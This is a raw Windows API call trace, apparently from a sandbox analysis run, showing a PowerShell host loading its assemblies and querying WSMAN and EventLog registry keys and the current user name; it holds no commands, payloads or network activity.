	[0287.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0287.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0287.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0287.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0287.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0287.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0287.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0287.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0288.574] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0288.574] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.575] CoTaskMemFree (pv=0x518270) 
	[0288.576] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0288.576] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.576] CoTaskMemFree (pv=0x518270) 
	[0288.578] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0288.578] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.578] CoTaskMemFree (pv=0x518270) 
	[0288.580] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0288.580] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.580] CoTaskMemFree (pv=0x518270) 
	[0288.592] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0288.592] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.592] CoTaskMemFree (pv=0x518270) 
	[0288.594] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0288.594] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.594] CoTaskMemFree (pv=0x518270) 
	[0288.595] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0288.595] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.595] CoTaskMemFree (pv=0x518270) 
	[0288.603] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d318 | out: phkResult=0x26d318*=0x32c) returned 0x0
	[0288.606] RegQueryInfoKeyW (in: hKey=0x32c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d21c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d218, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d21c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d218*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0288.606] CoTaskMemFree (pv=0x0) 
	[0288.607] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0288.607] RegEnumValueW (in: hKey=0x32c, dwIndex=0x0, lpValueName=0x4c3ad0, lpcchValueName=0x26d2c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x26d2c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0288.608] CoTaskMemFree (pv=0x4c3ad0) 
	[0288.608] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0288.608] RegEnumValueW (in: hKey=0x32c, dwIndex=0x1, lpValueName=0x4c3ad0, lpcchValueName=0x26d2c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x26d2c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0288.608] CoTaskMemFree (pv=0x4c3ad0) 
	[0288.608] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0288.608] RegEnumValueW (in: hKey=0x32c, dwIndex=0x2, lpValueName=0x4c3ad0, lpcchValueName=0x26d2c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x26d2c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0288.608] CoTaskMemFree (pv=0x4c3ad0) 
	[0288.609] RegQueryValueExW (in: hKey=0x32c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d2ac, lpData=0x0, lpcbData=0x26d2a8*=0x0 | out: lpType=0x26d2ac*=0x1, lpData=0x0, lpcbData=0x26d2a8*=0x8) returned 0x0
	[0288.609] CoTaskMemAlloc (cb=0xc) returned 0x5304f0
	[0288.609] RegQueryValueExW (in: hKey=0x32c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d27c, lpData=0x5304f0, lpcbData=0x26d278*=0x8 | out: lpType=0x26d27c*=0x1, lpData="2.0", lpcbData=0x26d278*=0x8) returned 0x0
	[0288.609] CoTaskMemFree (pv=0x5304f0) 
	[0289.294] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d268 | out: phkResult=0x26d268*=0x328) returned 0x0
	[0289.294] RegQueryInfoKeyW (in: hKey=0x328, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d16c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d168, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d16c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d168*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.294] CoTaskMemFree (pv=0x0) 
	[0289.294] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0289.294] RegEnumValueW (in: hKey=0x328, dwIndex=0x0, lpValueName=0x4c3ad0, lpcchValueName=0x26d218, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x26d218, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0289.294] CoTaskMemFree (pv=0x4c3ad0) 
	[0289.294] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0289.294] RegEnumValueW (in: hKey=0x328, dwIndex=0x1, lpValueName=0x4c3ad0, lpcchValueName=0x26d218, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x26d218, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0289.295] CoTaskMemFree (pv=0x4c3ad0) 
	[0289.295] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0289.295] RegEnumValueW (in: hKey=0x328, dwIndex=0x2, lpValueName=0x4c3ad0, lpcchValueName=0x26d218, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x26d218, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0289.295] CoTaskMemFree (pv=0x4c3ad0) 
	[0289.295] RegQueryValueExW (in: hKey=0x328, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d1fc, lpData=0x0, lpcbData=0x26d1f8*=0x0 | out: lpType=0x26d1fc*=0x1, lpData=0x0, lpcbData=0x26d1f8*=0x8) returned 0x0
	[0289.295] CoTaskMemAlloc (cb=0xc) returned 0x530570
	[0289.295] RegQueryValueExW (in: hKey=0x328, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d1cc, lpData=0x530570, lpcbData=0x26d1c8*=0x8 | out: lpType=0x26d1cc*=0x1, lpData="2.0", lpcbData=0x26d1c8*=0x8) returned 0x0
	[0289.295] CoTaskMemFree (pv=0x530570) 
	[0289.296] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0289.296] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0289.296] CoTaskMemFree (pv=0x518270) 
	[0289.301] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0289.301] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0289.301] CoTaskMemFree (pv=0x518270) 
	[0290.011] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d298 | out: phkResult=0x26d298*=0x300) returned 0x0
	[0290.015] RegQueryInfoKeyW (in: hKey=0x300, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d20c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d208, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d20c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d208*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.015] CoTaskMemFree (pv=0x0) 
	[0290.016] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.016] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x0, lpName=0x4c3ad0, lpcchName=0x26d298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.016] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.016] CoTaskMemFree (pv=0x0) 
	[0290.016] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.016] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x1, lpName=0x4c3ad0, lpcchName=0x26d298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.016] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.016] CoTaskMemFree (pv=0x0) 
	[0290.016] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.016] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x2, lpName=0x4c3ad0, lpcchName=0x26d298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.016] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.016] CoTaskMemFree (pv=0x0) 
	[0290.017] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.017] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x3, lpName=0x4c3ad0, lpcchName=0x26d298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.017] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.017] CoTaskMemFree (pv=0x0) 
	[0290.017] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.017] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x4, lpName=0x4c3ad0, lpcchName=0x26d298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.017] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.017] CoTaskMemFree (pv=0x0) 
	[0290.017] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.017] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x5, lpName=0x4c3ad0, lpcchName=0x26d298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.017] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.017] CoTaskMemFree (pv=0x0) 
	[0290.017] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.017] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x6, lpName=0x4c3ad0, lpcchName=0x26d298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.017] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.017] CoTaskMemFree (pv=0x0) 
	[0290.017] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.017] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x7, lpName=0x4c3ad0, lpcchName=0x26d298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.017] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.017] CoTaskMemFree (pv=0x0) 
	[0290.017] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.017] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x8, lpName=0x4c3ad0, lpcchName=0x26d298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.018] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.018] CoTaskMemFree (pv=0x0) 
	[0290.018] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2f8 | out: phkResult=0x26d2f8*=0x304) returned 0x0
	[0290.018] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2f8 | out: phkResult=0x26d2f8*=0x0) returned 0x2
	[0290.018] RegOpenKeyExW (in: hKey=0x300, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2f8 | out: phkResult=0x26d2f8*=0x308) returned 0x0
	[0290.018] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2f8 | out: phkResult=0x26d2f8*=0x0) returned 0x2
	[0290.018] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2f8 | out: phkResult=0x26d2f8*=0x31c) returned 0x0
	[0290.018] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2f8 | out: phkResult=0x26d2f8*=0x0) returned 0x2
	[0290.018] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2f8 | out: phkResult=0x26d2f8*=0x330) returned 0x0
	[0290.018] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2f8 | out: phkResult=0x26d2f8*=0x0) returned 0x2
	[0290.018] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2f8 | out: phkResult=0x26d2f8*=0x334) returned 0x0
	[0290.018] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2f8 | out: phkResult=0x26d2f8*=0x0) returned 0x2
	[0290.019] RegOpenKeyExW (in: hKey=0x300, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2f8 | out: phkResult=0x26d2f8*=0x338) returned 0x0
	[0290.019] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2f8 | out: phkResult=0x26d2f8*=0x0) returned 0x2
	[0290.019] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2f8 | out: phkResult=0x26d2f8*=0x33c) returned 0x0
	[0290.019] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2f8 | out: phkResult=0x26d2f8*=0x0) returned 0x2
	[0290.019] RegOpenKeyExW (in: hKey=0x300, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2f8 | out: phkResult=0x26d2f8*=0x340) returned 0x0
	[0290.019] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2f8 | out: phkResult=0x26d2f8*=0x0) returned 0x2
	[0290.019] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2f8 | out: phkResult=0x26d2f8*=0x344) returned 0x0
	[0290.019] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2f8 | out: phkResult=0x26d2f8*=0x348) returned 0x0
	[0290.019] RegCloseKey (hKey=0x348) returned 0x0
	[0290.020] RegCloseKey (hKey=0x300) returned 0x0
	[0290.021] RegCloseKey (hKey=0x344) returned 0x0
	[0290.034] CoTaskMemAlloc (cb=0x804) returned 0x1b8ad760
	[0290.034] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8ad760, nSize=0x26d508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d508) returned 0x1
	[0290.035] CoTaskMemFree (pv=0x1b8ad760) 
	[0290.036] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.036] GetUserNameW (in: lpBuffer=0x4c3ad0, pcbBuffer=0x26d548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d548) returned 1
	[0290.037] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.986] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d248 | out: phkResult=0x26d248*=0x34c) returned 0x0
	[0290.986] RegQueryInfoKeyW (in: hKey=0x34c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d1bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d1b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d1bc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d1b8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.986] CoTaskMemFree (pv=0x0) 
	[0290.986] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.986] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x0, lpName=0x4c3ad0, lpcchName=0x26d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.986] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.986] CoTaskMemFree (pv=0x0) 
	[0290.986] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.986] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x1, lpName=0x4c3ad0, lpcchName=0x26d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.986] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.986] CoTaskMemFree (pv=0x0) 
	[0290.986] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.986] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x2, lpName=0x4c3ad0, lpcchName=0x26d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.986] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.986] CoTaskMemFree (pv=0x0) 
	[0290.986] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.986] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x3, lpName=0x4c3ad0, lpcchName=0x26d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.987] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.987] CoTaskMemFree (pv=0x0) 
	[0290.987] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.987] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x4, lpName=0x4c3ad0, lpcchName=0x26d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.987] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.987] CoTaskMemFree (pv=0x0) 
	[0290.987] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.987] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x5, lpName=0x4c3ad0, lpcchName=0x26d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.987] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.987] CoTaskMemFree (pv=0x0) 
	[0290.987] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.987] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x6, lpName=0x4c3ad0, lpcchName=0x26d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.987] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.987] CoTaskMemFree (pv=0x0) 
	[0290.987] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.987] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x7, lpName=0x4c3ad0, lpcchName=0x26d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.987] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.987] CoTaskMemFree (pv=0x0) 
	[0290.987] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.987] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x8, lpName=0x4c3ad0, lpcchName=0x26d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.987] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.987] CoTaskMemFree (pv=0x0) 
	[0290.987] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x350) returned 0x0
